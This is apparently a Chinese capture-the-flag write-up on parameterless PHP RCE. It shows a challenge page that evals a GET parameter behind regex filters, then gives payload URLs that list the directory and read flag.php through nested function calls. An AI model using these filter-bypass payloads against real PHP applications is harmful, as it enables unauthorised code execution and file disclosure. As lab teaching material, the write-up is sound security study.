GXYCTF2019 禁止套娃
本题考点:
- 无参数 RCE
- 对 PHP 函数的了解
# 知识点
无参数 RCE
eval($_GET['exp']);
参考链接:
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/# 什么是无参数函数 RCE
1. 利用超全局变量进行 bypass,进行 RCE
2. 进行任意文件读取
形式:
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}
也就是说
正则匹配了一些关键字比如 et 导致很多函数不能用,getshell 什么的基本不可能。
该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数
a(b(c()));
a();
但不允许
a('123');
# 解题过程
扫描目录 ,发现.git , githack 读取源码
<?php | |
include "flag.php"; | |
echo "flag在哪里呢?<br>"; | |
if(isset($_GET['exp'])){ | |
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { | |
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { | |
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { | |
// echo $_GET['exp']; | |
@eval($_GET['exp']); | |
} | |
else{ | |
die("还差一点哦!"); | |
} | |
} | |
else{ | |
die("再好好想想!"); | |
} | |
} | |
else{ | |
die("还想读flag,臭弟弟!"); | |
} | |
} | |
// highlight_file(__FILE__); | |
?> |
分析源码:
1.需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。 | |
2.过滤了常用的几个伪协议,不能以伪协议读取文件。 | |
3.(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。 | |
4.正则匹配掉了et/na/info等关键字,很多函数都用不了。 | |
5:eval($_GET['exp']); 典型的无参数RCE |
既然 getshell 基本不可能,那么考虑读源码
看源码,flag 应该就在 flag.php
我们想办法读取
首先需要得到当前目录下的文件
scandir () 函数可以扫描当前目录下的文件,例如:
<?php | |
print_r(scandir('.')); | |
?> |
那么问题就是如何构造
scandir ('.')
这里再看函数:
localeconv () 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current () 返回数组中的当前单元,默认取第一个值。
pos () current () 的别名。
这里还有一个知识点:
current (localeconv ()) 永远都是个点
那么我们第一步就解决了:
print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));
现在的问题就是怎么读取倒数第二个数组呢?
看手册:
很明显,我们不能直接得到倒数第二组中的内容:
三种方法:
1.array_reverse()
以相反的元素顺序返回数组
?exp=print_r(array_reverse(scandir(current(localeconv()))));
2.array_rand(array_flip())
array_flip () 交换数组的键和值
?exp=print_r(array_flip(scandir(current(localeconv()))));
array_rand () 从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回,本题目中 scandir () 返回的数组只有 5 个元素,刷新几次就能刷出来 flag.php
?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));
3.session_id(session_start())
本题目虽然 ban 了 hex 关键字,导致 hex2bin () 被禁用,但是我们可以并不依赖于十六进制转 ASCII 的方式,因为 flag.php 这些字符是 PHPSESSID 本身就支持的。
使用 session 之前需要通过 session_start () 告诉 PHP 使用 session,php 默认是不主动使用 session 的。
session_id () 可以获取到当前的 session id。
因此我们手动设置名为 PHPSESSID 的 cookie,并设置值为 flag.php
那么我们最后一个问题:
如何读 flag.php 的源码
因为 et 被 ban 了,所以不能使用 file_get_contents (),但是可以可以使用 readfile () 或 highlight_file () 以及其别名函数 show_source ()
/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
?exp=show_source(session_id(session_start()));
得到 flag
参考链接:
参考文章
什么是无参数函数 RCE
